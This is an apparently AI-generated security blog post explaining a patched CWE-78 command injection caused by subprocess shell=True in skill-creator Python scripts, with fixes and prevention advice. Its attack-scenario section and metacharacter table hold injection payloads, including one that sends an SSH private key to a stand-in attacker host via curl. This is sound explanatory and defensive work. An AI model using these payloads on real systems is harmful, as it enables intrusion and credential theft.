Command Injection via shell=True: How One Flag Opens the Door to OS Takeover

A critical command injection vulnerability (CWE-78) was discovered and patched in the skill-creator pipeline, where Python scripts passed unsanitized user input directly to subprocess calls with `shell=True`, allowing attackers to execute arbitrary operating system commands. This fix closes a dangerous attack vector that could have enabled full system compromise, data exfiltration, and lateral movement within affected environments.

By orbisai0security
May 9, 2026
#security #command-injection #python #subprocess #CWE-78 #OWASP #secure-coding

Vulnerability: CWE-78 — OS Command Injection
Severity: 🔴 Critical
Affected Files: run_eval.py, improve_description.py, generate_review.py
Status: ✅ Patched


Introduction

There's a deceptively innocent-looking parameter in Python's subprocess module that has been responsible for countless critical security vulnerabilities: shell=True. When combined with user-supplied input, this single flag can transform a routine script execution into a full operating system takeover.

This post breaks down a recently patched critical vulnerability found in the skill-creator pipeline — a real-world example of how shell=True and unsanitized input create a perfect storm for command injection attacks. Whether you're a seasoned backend engineer or a developer just getting started with Python scripting, understanding this class of vulnerability is non-negotiable in today's threat landscape.


The Vulnerability Explained

What Is Command Injection?

OS Command Injection (CWE-78) occurs when an application passes user-controlled data to a system shell without proper sanitization. The shell — whether bash, sh, cmd.exe, or others — interprets special characters as control operators, not as literal data. This means an attacker can "break out" of the intended command and inject their own.

In Python, the danger zone looks like this:

# ❌ VULNERABLE: shell=True with user input
import subprocess

# `request` is assumed to be a Flask-style request object inside a web handler
user_input = request.args.get("skill_name")
subprocess.Popen(f"run_eval --skill {user_input}", shell=True)

When shell=True is set, Python hands the entire string to the operating system shell for interpretation. The shell doesn't know or care which parts were "intended" by the developer — it processes everything according to its own syntax rules.
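To see this behavior without any risk, the following sketch runs a harmless payload through a POSIX shell. The payload string and the echo commands are illustrative assumptions, not code from the affected scripts; on Windows the shell is cmd.exe and its syntax differs.

```python
import subprocess

# Hypothetical, harmless stand-in for attacker-controlled input
user_input = "my_skill; echo INJECTED"

# With shell=True the whole string is handed to the shell (/bin/sh -c "..."),
# so the semicolon splits it into two separate commands.
completed = subprocess.run(
    f"echo evaluating {user_input}",
    shell=True,
    capture_output=True,
    text=True,
)

shell_lines = completed.stdout.splitlines()
print(shell_lines)  # ['evaluating my_skill', 'INJECTED']
```

The second line of output comes from a command the developer never wrote, which is the essence of the problem.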

How Does the Shell Interpret Special Characters?

The OS shell recognizes a variety of characters as command operators:

| Character | Shell Meaning | Example Attack |
|---|---|---|
| ; | Command separator | skill; rm -rf / |
| \| | Pipe output to next command | skill \| curl attacker.com |
| && | Run next if previous succeeds | skill && cat /etc/passwd |
| \|\| | Run next if previous fails | skill \|\| whoami |
| \` | Command substitution | skill\`id\` |
| $() | Command substitution | skill$(cat ~/.ssh/id_rsa) |
| > | Redirect output | skill > /tmp/backdoor.sh |

The Vulnerable Code Pattern

In the skill-creator pipeline, three scripts were identified as invoking subprocess.Popen or subprocess.run with shell=True while incorporating user-supplied CLI arguments directly into the command string:

# ❌ VULNERABLE pattern (simplified illustration)
import subprocess
import sys

skill_path = sys.argv[1]  # User-controlled input from CLI argument

# The entire string is passed to the shell — shell=True is the culprit
result = subprocess.Popen(
    f"python evaluate.py --input {skill_path}",
    shell=True,
    stdout=subprocess.PIPE
)

This pattern appeared across:
- resources/skills/skill-creator/scripts/run_eval.py (line 85)
- resources/skills/skill-creator/scripts/improve_description.py
- resources/skills/skill-creator/eval-viewer/generate_review.py

A Concrete Attack Scenario

Let's make this tangible. Imagine a developer runs the skill evaluation pipeline and the skill_path argument is sourced from an external input — a config file, an API response, a web form, or even a crafted filename:

Normal input:

/home/user/skills/my_skill

Malicious input:

/home/user/skills/my_skill; curl -s https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) &

The shell now executes two commands:
1. python evaluate.py --input /home/user/skills/my_skill ← intended
2. curl -s https://attacker.com/exfil?data=<base64-encoded SSH private key> ← injected
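The split into two commands can be approximated in Python with the standard shlex module. This is only a sketch: shlex is not a full shell parser, and the payload below is a harmless, hypothetical variant of the malicious input (the curl call is replaced by echo).

```python
import shlex

# Hypothetical, harmless variant of the malicious input above
skill_path = "/home/user/skills/my_skill; echo INJECTED"
command = f"python evaluate.py --input {skill_path}"

# punctuation_chars=True makes shlex emit shell operators such as ";"
# as separate tokens, roughly as a POSIX shell would.
lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
tokens = list(lexer)

# Group the tokens into commands, starting a new one at each ";" operator
commands = [[]]
for token in tokens:
    if token == ";":
        commands.append([])
    else:
        commands[-1].append(token)

for index, argv in enumerate(commands, start=1):
    print(index, argv)
```

The first group is the command the developer intended; the second exists only because the input contained a semicolon.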

In a CI/CD pipeline or automated evaluation environment, this could lead to:

  • 🔑 Credential theft — SSH keys, API tokens, environment variables
  • 🗂️ Data exfiltration — source code, model weights, proprietary datasets
  • 🚪 Backdoor installation — persistent access via reverse shells
  • 💣 Destructive actions — file deletion, service disruption
  • 🌐 Lateral movement — pivoting to other systems on the network

The impact is classified as Critical because successful exploitation grants the attacker the same OS-level privileges as the process running the script — with no authentication required beyond the ability to influence the input.


The Fix

The Core Principle: Never Use shell=True with User Input

The fix involves two complementary changes:

  1. Remove shell=True — pass commands as a list instead of a string
  2. Validate and sanitize inputs — never trust external data

Before vs. After

❌ Before (Vulnerable):

import subprocess
import sys

skill_path = sys.argv[1]

# shell=True interprets the entire string through the OS shell
result = subprocess.Popen(
    f"python evaluate.py --input {skill_path}",
    shell=True,
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE
)

✅ After (Fixed):

import subprocess
import sys
import os

skill_path = sys.argv[1]

# Validate the input before use
if not os.path.exists(skill_path):
    raise ValueError(f"Invalid skill path: {skill_path}")

# Pass as a list: no shell is involved, so metacharacters are not interpreted
result = subprocess.Popen(
    ["python", "evaluate.py", "--input", skill_path],
    shell=False,  # explicit is better than implicit
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE
)

Why Does the List Form Prevent Injection?

When you pass a list to subprocess.Popen (without shell=True), Python launches the process directly, using os.execvpe()-like behavior on POSIX and CreateProcess on Windows. Each list element becomes a discrete argument, and no shell is invoked to interpret the string.

This means special characters like ;, |, and $() are passed literally to the target program as part of an argument value. They have no special meaning, so the shell injection vector is closed. The target program still parses its own arguments, however, so a value that begins with - could be read as an option; input validation remains necessary.

# These are equivalent in intent, but VERY different in security:

# ❌ Shell interprets the string — injection possible
subprocess.run(f"echo {user_input}", shell=True)

# ✅ OS passes arguments directly, so there is no shell to inject into
subprocess.run(["echo", user_input], shell=False)
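The literal pass-through can be checked with a small experiment. In this sketch, a child Python process simply writes back the first argument it received; the payload strings are adapted from the metacharacter examples earlier in the post, and the child program is an assumption made for illustration.

```python
import subprocess
import sys

# Payloads adapted from the metacharacter examples earlier in the post
payloads = [
    "skill; rm -rf /",
    "skill | curl attacker.com",
    "skill && cat /etc/passwd",
    "skill$(id)",
    "skill > /tmp/backdoor.sh",
]

# A tiny child program that writes back the first argument it received
child_code = "import sys; sys.stdout.write(sys.argv[1])"

received = []
for payload in payloads:
    completed = subprocess.run(
        [sys.executable, "-c", child_code, payload],
        capture_output=True,
        text=True,
        check=True,
    )
    received.append(completed.stdout)

# Every payload arrives unchanged as a single argument; nothing is executed
print(received == payloads)
```

Because no shell is involved, none of the embedded commands run and no files are created or removed.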

When shell=True Is Genuinely Needed

Occasionally, shell features like glob expansion (*.txt), shell built-ins (cd, export), or pipe chaining are legitimately required. In those cases:

import shlex
import subprocess

# shlex.quote() wraps the value in single quotes and escapes internal quotes
safe_input = shlex.quote(user_input)
subprocess.run(f"some_command {safe_input}", shell=True)

However, shlex.quote() should be considered a last resort, not a first line of defense. It is designed for POSIX shells only and is not guaranteed to be correct for cmd.exe or other non-POSIX shells. Eliminating shell=True remains the preferred approach wherever possible.
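For reference, here is roughly what shlex.quote() produces and how a POSIX shell treats the result. The input values are hypothetical, and the echo command stands in for whatever program is actually being run.

```python
import shlex
import subprocess

user_input = "my_skill; echo INJECTED"  # hypothetical hostile value
quoted = shlex.quote(user_input)
print(quoted)  # 'my_skill; echo INJECTED'

# The quoted value reaches echo as one literal argument
completed = subprocess.run(
    f"echo {quoted}",
    shell=True,
    capture_output=True,
    text=True,
)
quoted_lines = completed.stdout.splitlines()
print(quoted_lines)  # ['my_skill; echo INJECTED']

# Embedded single quotes are closed, escaped, and reopened
tricky = shlex.quote("it's")
print(tricky)  # 'it'"'"'s'
```

The semicolon is now just text inside a single-quoted string, so only one command runs.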


Prevention & Best Practices

1. Default to List-Form Subprocess Calls

Make it a team convention: subprocess calls always use list arguments unless there's a documented, reviewed reason to do otherwise.

# Establish this as your team's standard pattern
subprocess.run(["command", "arg1", "arg2", user_input], check=True)
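One way to back the convention with code is a thin wrapper that refuses string commands and shell=True outright. The helper name run_command is hypothetical, and this is a minimal sketch rather than a drop-in replacement for subprocess.run.

```python
import subprocess
import sys
from typing import Sequence


def run_command(args: Sequence[str], **kwargs) -> subprocess.CompletedProcess:
    """Run a command given as a list of arguments, never through a shell."""
    if isinstance(args, (str, bytes)):
        raise TypeError("pass the command as a list of arguments, not a string")
    if kwargs.get("shell"):
        raise ValueError("shell=True is not allowed in run_command")
    kwargs["shell"] = False
    kwargs.setdefault("check", True)  # fail loudly on non-zero exit codes
    return subprocess.run(list(args), **kwargs)


# Usage: the list form works, the string form is rejected
ok = run_command(
    [sys.executable, "-c", "print('ok')"],
    capture_output=True,
    text=True,
)
print(ok.stdout.strip())

try:
    run_command("echo hello")
except TypeError as exc:
    print("rejected:", exc)
```

Routing calls through a helper like this gives reviewers a single place to audit and makes direct subprocess usage easy to flag.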

2. Validate Inputs Before Processing

Apply allowlist validation to any input that will be used in a subprocess call:

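import re
import os

def validate_skill_path(path: str) -> str:
    """Validate that a skill path is safe to use."""
    # Allowlist: only alphanumerics, hyphens, underscores, slashes, dots.
    # fullmatch avoids the trailing-newline loophole of match() with $.
    if not re.fullmatch(r'[a-zA-Z0-9/_.-]+', path):
        raise ValueError(f"Skill path contains invalid characters: {path!r}")

    # Resolve symlinks and "..", then require the result to sit inside the
    # expected directory (a bare startswith would also accept /app/skills_evil)
    abs_path = os.path.realpath(path)
    allowed_base = os.path.realpath("/app/skills")
    if os.path.commonpath([abs_path, allowed_base]) != allowed_base:
        raise ValueError("Path traversal detected")

    # Ensure the path actually exists
    if not os.path.exists(abs_path):
        raise ValueError(f"Skill path does not exist: {path!r}")

    return abs_path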
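A detail worth checking in any containment test is that a plain string-prefix comparison also accepts sibling directories whose names merely start with the allowed base. The sketch below compares the two approaches; is_within is a hypothetical helper name, and the paths are illustrative only.

```python
import os


def is_within(base: str, candidate: str) -> bool:
    """Return True if candidate resolves to base or to a path beneath it."""
    base_real = os.path.realpath(base)
    candidate_real = os.path.realpath(candidate)
    return os.path.commonpath([base_real, candidate_real]) == base_real


base = "/app/skills"
sibling = "/app/skills_evil/payload"  # outside the base, but shares its prefix
inside = "/app/skills/my_skill"
escaping = "/app/skills/../secrets"

# A naive prefix check is fooled by the sibling directory
prefix_accepts_sibling = os.path.realpath(sibling).startswith(
    os.path.realpath(base)
)

print(prefix_accepts_sibling)
print(is_within(base, sibling), is_within(base, inside), is_within(base, escaping))
```

Comparing whole path components with os.path.commonpath avoids the false positive without any manual separator handling.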

3. Apply the Principle of Least Privilege

Run scripts with the minimum permissions required. A command injection in a low-privilege process is far less damaging than one running as root or with broad cloud IAM permissions.

# Run evaluation scripts as a dedicated, restricted user
sudo -u skill-evaluator python run_eval.py --input "$SKILL_PATH"
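The same idea applies to what a child process inherits. As a sketch, passing an explicit, minimal environment keeps secrets held in environment variables out of the child's reach. The variable name DEMO_API_TOKEN is hypothetical, and on Windows a child typically needs additional variables such as SYSTEMROOT.

```python
import os
import subprocess
import sys

# Simulate a secret present in the parent environment (hypothetical name)
os.environ["DEMO_API_TOKEN"] = "s3cr3t"

# Pass only what the child needs instead of letting it inherit everything
minimal_env = {"PATH": os.environ.get("PATH", "")}

child_code = "import os; print(os.environ.get('DEMO_API_TOKEN'))"
completed = subprocess.run(
    [sys.executable, "-c", child_code],
    env=minimal_env,
    capture_output=True,
    text=True,
    check=True,
)

child_view = completed.stdout.strip()
print(child_view)  # the child does not see the token
```

If the child were ever compromised, there would be one less credential for it to leak.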

4. Use Static Analysis Tools

Integrate security scanners into your CI/CD pipeline to catch these patterns automatically:

  • Bandit: Python-specific security linter; rule B602 flags subprocess calls made with shell=True, while B603 flags subprocess calls made without it so that their arguments still get reviewed
  • Semgrep: Highly customizable static analysis with rules for subprocess injection
  • CodeQL: GitHub's semantic code analysis engine
  • Safety: Checks Python dependencies for known vulnerabilities

# Example: Bandit in GitHub Actions
- name: Run Bandit Security Scan
  run: |
    pip install bandit
    bandit -r . -ll --skip B101 -f json -o bandit-report.json
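To give a sense of what such scanners look for, here is a minimal sketch of an AST-based check that reports calls passing shell=True. The function name find_shell_true is hypothetical; real tools such as Bandit track far more context, so this is an illustration and not a substitute.

```python
import ast
from typing import List


def find_shell_true(source: str) -> List[int]:
    """Return line numbers of calls that pass shell=True as a keyword."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        for keyword in node.keywords:
            if (
                keyword.arg == "shell"
                and isinstance(keyword.value, ast.Constant)
                and keyword.value.value is True
            ):
                hits.append(node.lineno)
    return sorted(hits)


sample = '''import subprocess
subprocess.run(["ls", "-l"])
subprocess.run("ls -l", shell=True)
subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
'''

print(find_shell_true(sample))  # [3, 4]
```

The source is only parsed, never executed, so a check like this is safe to run on untrusted code.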

5. Code Review Checklist

Add these questions to your security-focused code review checklist:

  • [ ] Does this code call subprocess with shell=True?
  • [ ] Does any subprocess argument originate from user input, environment variables, or external data sources?
  • [ ] Is input validated against an allowlist before use?
  • [ ] Does the process run with the minimum required privileges?

6. Relevant Security Standards

This vulnerability maps to well-established security standards, including CWE-78 (OS Command Injection) and the Injection category of the OWASP Top 10.


Conclusion

The shell=True vulnerability pattern is a textbook example of how a single, seemingly convenient parameter can introduce catastrophic security risk. The fix is straightforward — switch from string-based to list-based subprocess calls — but the lesson runs deeper: never trust user input, and always understand the security implications of the APIs you use.

Key takeaways from this vulnerability:

  1. shell=True + user input = command injection. This is one of the most reliable rules in application security.
  2. The fix is simple but the impact of not fixing it is severe — Critical-severity vulnerabilities like this can lead to full system compromise.
  3. Defense in depth matters — Input validation, least privilege, and static analysis together create multiple layers of protection.
  4. Automated scanning catches what code review misses — Integrate tools like Bandit and Semgrep into your pipeline before code ships.

Security vulnerabilities like this one are rarely the result of malicious intent — they're the product of convenience, time pressure, and incomplete understanding of a platform's security model. The best defense is education, tooling, and a culture that treats security as a first-class concern alongside functionality and performance.

Write safe code. Review with security in mind. And when in doubt, check the docs for the security implications of every parameter you set.


This post was generated as part of an automated security fix workflow by OrbisAI Security. The vulnerability was identified by multi-agent AI scanning, patched, and verified through re-scan and LLM code review.

Have a vulnerability you'd like explained? Security education is the first line of defense.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #14842
